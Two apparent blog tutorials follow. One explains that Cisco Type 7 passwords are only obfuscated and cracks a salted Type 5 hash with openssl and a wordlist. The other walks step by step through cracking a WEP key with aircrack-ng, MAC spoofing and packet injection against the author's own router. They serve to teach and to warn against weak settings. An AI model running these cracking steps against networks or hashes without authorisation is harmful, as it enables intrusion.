Cisco – Cracking and Decrypting Passwords (Type 7 and Type 5)

KB ID 0000940 

Problem

Decrypt Type 7 Cisco Passwords

The Internet is full of sites that have something like the tool below, tap your ‘encrypted’ password in and it will reveal the Cisco password.

 

Input Type 7 Obfuscated Password: Output Plain Text Password:

As you can see I’ve specifically written ‘obfuscated’ above, because the password isn’t actually encrypted at all. All that happens is the Vigenere algorithm is used to obfuscate the password. While tools like the one above are all well and good, your Cisco router will do exactly the same for you, to demonstrate, paste the following into the tool above.

107D1C09560521580F16693F14082026351C1512

Hopefully you will get the password Sup3rS3cr#tP@ssword.

Your router can also convert that to clear text for you;

[box]

Petes-Router#
Petes-Router#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Petes-Router(config)#key chain decrypt
Petes-Router(config-keychain)#key 0
Petes-Router(config-keychain-key)#key-string 7 107D1C09560521580F16693F14082026351C1512
Petes-Router(config-keychain-key)#exit
Petes-Router(config-keychain)#exit
Petes-Router(config)#exit
Petes-Router#
*Mar 1 00:04:48.691: %SYS-5-CONFIG_I: Configured from console by console
Petes-Router#show key chain decrypt
Key-chain decrypt:
key 0 -- text "Sup3rS3cr#tP@ssword"
accept lifetime (always valid) - (always valid) [valid now]
send lifetime (always valid) - (always valid) [valid now]
Petes-Router#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Petes-Router(config)#no key chain decrypt

[/box]

So whats the point of these type 7 passwords? Well the only real benefit of them is if someone is looking over your shoulder while you are looking at the config, they can’t see actual passwords in the config.

The passwords in my config are in clear text? That’s because there are three levels of password storage 0 (not encrypted), 7 (weakly encrypted), and (5 strongly encrypted). If you want to convert your config to display them as 7 you need to enter the service password-encryption command;

[box]

Petes-Router#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Petes-Router(config)#service password-encryption
Petes-Router(config)#

Before

username pete password 0 Password123

After

username pete password 7 142713181F13253920796166

[/box]

If Type 7 passwords are so weak, how do I use Type 5 passwords? When creating accounts use the secret command like so;

[box]

Petes-Router#configure terminal
Enter configuration commands, one per line. End with CNTL/Z.
Petes-Router(config)#username petelong secret Password123
Petes-Router(config)#

Displays in the config as;

username petelong secret 5 $1$VkQd$Vma3sR7B1LL.v5lgy1NYc/

[/box]

Decrypting Type 5 Cisco Passwords

 

Decrypting a Type 5 Cisco password is an entirely different ball game, they are considered ‘secure’ because they are ‘salted’ (have some random text added to the password to create an MD5 hash) however that random salt is shown in the config.

[box]

username attackme secret 5 $1$TMnL$iAFs16ZXx7x18vR1DeIp6/

[/box]

Well armed with the salt and the hash, we can use exactly the same method that Cisco use to create the encrypted password, by brute force attacking the password, this might sound like a difficult piece of hacking ninja skill, but we simply use openssl on a Linux box (here I’m using CentOS 6.5), all you need is a wordlist.txt file (search the Internet).

Feed openssl the salt, and a piece of the hash (see the example above), and it will run through, (grep) the wordlist until it finds a match, where it spits out the decrypted password an the original hash like so;

[box]

[root@pnl-server1 ~]# openssl passwd -1 -salt TMnL -table -in wordlist.txt | grep 8vR1DeIp6
SECRETPASSWORD $1$TMnL$iAFs16ZXx7x18vR1DeIp6/
[root@pnl-server1 ~]#

[/box]

The decrypted password is SECRETPASSWORD

Note: The limitation here is the password has to be in the wordlist.txt file,but if you are adept at searching the Internet there are some impressive wordlist files out there, just make sure you use one that has full line breaks. Also remember, the longer the wordlist, the longer it takes.

Related Articles, References, Credits, or External Links

NA

Hacking Wireless WEP Keys with BackTrack and Aircrack-ng

KB ID 0000633

Problem

Disclaimer: This article is for educational purposes only. Having the ability to pick a lock does not make you a thief. The main thing to take away from this article is, “DONT secure your wireless network with WEP“.

WEP, has been around for a long time now, its limited to an alpha numeric password, 0-9 and A-F (because its in hexadecimal), the password can be 40, 64 or 126 bits long. The flaw is, each bit of information is encrypted with the SAME key, If you can get enough packets (24 bit long packets called IV’s), you can mathematically work out what the key is.

Solution

To do this I’m going to use BackTrack 5 (R1) installed in a Virtual machine, the Network card I’m using is an ALFA AWUS036NH USB wireless card, I’m using this card because the Ralink RT2878/3078 chipset that’s inside it just works with airmon-ng, without the need to patch drivers or mess about.

Note: If your wireless card does not work please do not email me go the the Aircrack-ng forums.

1. After I’ve plugged the wireless card into the host machine, I’m going to present it to the virtual machine. VM > Removable Devices > Ralink 802.11 n WLAN > Connect.

2. To make sure BackTrack can see the card issue the following command;

[box] airmon-ng [/box]

Take note of the interface name (in the example below it’s wlan0). Then to change the MAC address of the card we are going to ‘spoof’ a false MAC address of 00:11:22:33:44:55 with the following commands. (Note: Your interface may not be wlan0, change accordingly);

[box]airmon-ng stop wlan0
ifconfig wlan0 down
macchanger –mac 00:11:22:33:44:55 wlan0
airmon-ng start wlan[/box]

Then to scan and see what networks the card can see issue the following command

[box] airodump-ng wlan0 [/box]

3. Airodump will continue to scan until you press CTRL+C. When you see the target network, take a note of its BSSID and its channel number. My target below is called PeteNetLive and the bssid is 00:16:B6:B4:66:46 and its on channel 1).

4. Now scan the target network with the following command;

[box]SYNTAX
airodump-ng -c (channel) -w (file name) –bssid (bssid) (interface)
EXAMPLE
airodump-ng -c 1 -w PeteNetLive –bssid 00:16:B6:B4:66:46 wlan0[/box]

5. Leave that running, and open a new terminal window, execute the following command in the new window;

[box]SYNTAX
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 -e (essid) (interface)
EXAMPLE
aireplay-ng -1 0 -a 00:16:B6:B4:66:46 -h 00:11:22:33:44:55 -e PeteNetLive wlan0[/box]

YOU NEED it to say ‘Authentication successful‘.

6. To throw some traffic across the network issue the following command;

[box]SYNTAX
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
EXAMPLE
aireplay-ng -3 -b 00:16:B6:B4:66:46 -h 00:11:22:33:44:55 wlan0[/box]

Note: ‘-3’ denotes a client attack, if your data packets do not rise (you will understand in a minute), then try with ‘-4’ instead.

7. Back in the original terminal window the Data count should start to rise, do nothing further until its over 10,000 (that’s 10,000 IVs captured).

Reality Check!: In most tutorials (including my video above) this is a nice painless process, it relies on there being a decent quality signal, the router/access point not crashing because you are ‘battering’ it, and there being lots of healthy traffic around. You can get enough data packets without the ‘aireplay-ng -3’ command, but it will take a lot longer. You can stop and start the forcing of traffic by pressing CTRL+C, and then executing the command again (it just appends the data to the capture file). In this example I used about five attempts (the router froze and needed to be rebooted). So this is not a quick process. Someone passively attacking your wireless will need lot of patience. This took about an hour and I was right next to the router, and I rebooted it every time it locked up, (which I saw because the Data figure suddenly stopped rising).

8. In the example below I’m now over 10,000 IV’s captured, and I’ve stopped forcing traffic (CTRL+C).

9. By default your capture will be in your home folder, and it will be called filename-01.cap (where filename is the name you used in step 4).

10. To crack the key execute the following command;

[box]SYNTAX
aircrack-ng -b (bssid) (file name-01.cap)
EXAMPLE
aircrack-ng -b 00:16:B6:B4:66:46 PeteNetLive-01.cap[/box]

11. It will display the WEP key with colons in it, remove them,

DC:B4:2F:63:C9 = DCB42F63C9 <-Heres the WEP key!

12. And to prove it’s correct.

13. And to prove I didn’t just print a sticker, heres the web console of the router.

Related Articles, References, Credits, or External Links

Installing the BackTrack Linux VMware Virtual Machine

Windows – Export / Recover WEP and WPA Wireless Keys